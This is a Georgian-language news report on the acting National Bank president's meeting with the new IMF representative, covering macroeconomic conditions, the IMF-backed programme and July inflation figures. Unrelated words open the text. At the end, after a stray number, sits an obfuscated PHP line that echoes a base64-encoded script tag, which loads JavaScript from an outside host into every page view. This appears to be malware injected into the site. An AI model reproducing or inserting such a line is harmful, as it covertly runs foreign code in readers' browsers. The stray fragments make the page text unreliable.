celsiusi
ავერსი შნაიდერი

სსფ-ი ქვეყნის მნიშვნელოვანი პარტნიორია და მასთან მჭიდრო და ეფექტიანი თანამშრომლობა მომავალშიც გაგრძელდება, – ამის შესახებ ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, ნათია თურნავამ საერთაშორისო სავალუტო ფონდის ახალ წარმომადგენელთან საქართველოში, ენდრიუ ჯუველთან გაცნობითი ხასიათის შეხვედრაზე განაცხადა, რომელსაც სებ-ის მენეჯმენტი ესწრებოდა.

ეროვნული ბანკის ინფორმაციით, შეხვედრაზე საუბარი შეეხო ქვეყნის მაკროეკონომიკური მდგომარეობის მიმოხილვას, საერთაშორისო სავალუტო ფონდის მიერ მხარდაჭერილი საქართველოს ეკონომიკური პროგრამის მიმდინარეობას, ასევე, სსფ-ის ტექნიკური დახმარების საკითხებს. ფონდის მიერ მხარდაჭერილი პროგრამა ხელს უწყობს მაკროეკონომიკური სტაბილურობის განმტკიცებას.

„ეროვნულმა ბანკმა არაერთი თანმიმდევრული და ადეკვატური ნაბიჯი გადადგა გლობალურ გამოწვევებზე საპასუხოდ. სებ-ის მხრიდან სათანადო პოლიტიკის  გატარებამ ხელი შეუწყო ინფლაციის მოლოდინების მართვასა და ფასების სტაბილურობის უზრუნველყოფას. ინფლაცია ივლისში  0,3%-მდე შემცირდა, რაც მიზნობრივ 3%-იან მაჩვენებელზე საკმაოდ დაბალია, მაშინ როცა საბაზო ინფლაცია 3.1%-ს შეადგენდა“, – აცხადებენ ეროვნულ ბანკში.

672
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");